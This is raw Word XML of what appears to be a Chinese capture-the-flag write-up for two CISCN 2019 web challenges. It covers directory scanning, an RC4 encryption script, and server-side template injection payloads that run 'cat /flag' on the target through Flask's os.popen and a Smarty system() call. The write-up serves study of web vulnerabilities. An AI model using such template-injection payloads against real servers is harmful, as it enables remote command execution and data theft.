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67D2" w14:textId="77777777" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF391D6" w14:textId="4489D912" w:rsidR="00CC4BCA" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>[CISCN 2019华东南]Double Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED31A2" w14:textId="77777777" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35232FA0" w14:textId="758D51C3" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>用御剑扫描出三个目录</w:t>
      </w:r>
      <w:r>
        <w:t>/secret，/robots.txt，/console目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57F46E" w14:textId="490E2D5D" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据题目进入/secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE5FCA" w14:textId="352EA537" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5984F603" wp14:editId="7009D686">
            <wp:extent cx="5274310" cy="941705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="419696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6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1E0F" w14:textId="79229D27" w:rsidR="00712C1A" w:rsidRDefault="0071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尝试get注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD6393" w14:textId="2A265720" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE92472" wp14:editId="06172CDA">
            <wp:extent cx="5274310" cy="1271270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="20682161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6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5598" w14:textId="70CAE978" w:rsidR="00712C1A" w:rsidRDefault="0071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发现存在注入 瞎注后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE87331" w14:textId="7E112EE3" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7440B8A4" wp14:editId="027A141B">
            <wp:extent cx="5274310" cy="5624195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="185612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22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659" w14:textId="445B2282" w:rsidR="00712C1A" w:rsidRDefault="0071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发现源码泄露 ，rc有rc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解密,网搜一个rc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加密脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694893CB" w14:textId="77777777" w:rsidR="00712C1A" w:rsidRPr="00712C1A" w:rsidRDefault="00712C1A" w:rsidP="00712C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base64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urllib.parse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quote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712C1A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rc4_main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(key=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"init_key"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message=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"init_message"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print("RC4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加密主函数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")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 = rc4_init_sbox(key)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crypt = str(rc4_excrypt(message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s_box))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crypt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712C1A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rc4_init_sbox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(key):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s_box = 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list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))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我这里没管秘钥小于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256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的情况，小于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256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不断重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>复填充即可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原来的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s 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盒：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%s" % s_box)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=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j = (j + s_box[i] + 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ord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(key[i % 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len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(key)])) %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s_box[i]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s_box[j] = s_box[j]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s_box[i]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混乱后的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s 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盒：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%s"% s_box)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s_box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def </w:t>
      </w:r>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rc4_excrypt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(plain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box):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调用加密程序成功。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")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res = []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i = j =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s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plain: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i = (i +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%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j = (j + box[i]) %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box[i]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box[j] = box[j]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box[i]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 = (box[i] + box[j]) % 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t>256</w:t>
      </w:r>
      <w:r w:rsidRPr="00712C1A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k = box[t]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res.append(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chr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ord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(s) ^ k))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print("res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用于加密字符串，加密后是：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%res" %res)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cipher = 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""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.join(res)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r w:rsidRPr="00712C1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加密后的字符串是：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 xml:space="preserve">%s"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% quote(cipher))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# print("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加密后的输出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(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经过编码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>):")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print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))</w:t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str(base64.b64encode(cipher.encode(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'utf-8'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712C1A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712C1A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'utf-8'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712C1A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rc4_main("key", "text") </w:t>
      </w:r>
      <w:r w:rsidRPr="00712C1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密钥，恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880FACF" w14:textId="25BF239E" w:rsidR="00712C1A" w:rsidRDefault="0071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然后不会了，baidu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A587D" w14:textId="1D4846E5" w:rsidR="00712C1A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00712C1A" w:rsidRPr="006C672F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_53090346/article/details/125910763</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D22BE70" w14:textId="52CBDCBB" w:rsidR="00712C1A" w:rsidRDefault="00712C1A" w:rsidP="00712C1A">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>{{config.__class__.__init__.__globals__['os'].popen('cat /flag.txt').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5CC5B" w14:textId="5F7EC5EE" w:rsidR="00712C1A" w:rsidRDefault="00712C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rc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加密后传入得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71E3D0" w14:textId="34E3A5EC" w:rsidR="00712C1A" w:rsidRDefault="00712C1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712C1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C612282" wp14:editId="6DF56ED2">
            <wp:extent cx="5274310" cy="800735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1402722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22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A22B" w14:textId="70CED322" w:rsidR="00712C1A" w:rsidRDefault="006C71B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[CISCN 2019华东南]Web11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F71DB" w14:textId="188C960E" w:rsidR="006C71B2" w:rsidRDefault="006C71B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C71B2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646560E3" wp14:editId="2940D239">
            <wp:extent cx="5274310" cy="662940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="111438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5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DE36" w14:textId="69E43A24" w:rsidR="006C71B2" w:rsidRDefault="006C71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看到xff想到xff欺骗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501543F" w14:textId="4552878E" w:rsidR="006C71B2" w:rsidRDefault="006C71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用burp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抓包后结合标签ssti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3C1B8" w14:textId="0BDA7880" w:rsidR="006C71B2" w:rsidRDefault="006C71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构造xxf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7*7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>得ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36085F" w14:textId="5B532BB1" w:rsidR="006C71B2" w:rsidRDefault="006C71B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C71B2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C001FD" wp14:editId="6F1B1A92">
            <wp:extent cx="5274310" cy="1974215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="920096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96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FEFE" w14:textId="2401FBA4" w:rsidR="006C71B2" w:rsidRDefault="006C71B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload:xxf:{system(‘cat /flag’)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E94744" w14:textId="53AAEF66" w:rsidR="006C71B2" w:rsidRDefault="006C71B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C71B2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FAF0D45" wp14:editId="5E40ACC8">
            <wp:extent cx="5274310" cy="1613535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1895379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79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4BCC" w14:textId="0598E40D" w:rsidR="006C71B2" w:rsidRPr="006C71B2" w:rsidRDefault="006C71B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得到flag</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006C71B2" w:rsidRPr="006C7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F6"/>
    <w:rsid w:val="002E11F6"/>
    <w:rsid w:val="006C71B2"/>
    <w:rsid w:val="00712C1A"/>
    <w:rsid w:val="00787434"/>
    <w:rsid w:val="00CC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9902"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{919C6E0D-4617-4E71-9424-605E4E52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12C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2C1A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712C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C1A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00712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8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eixin_53090346/article/details/12591076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某</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>王 某</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-05T15:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-05T16:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>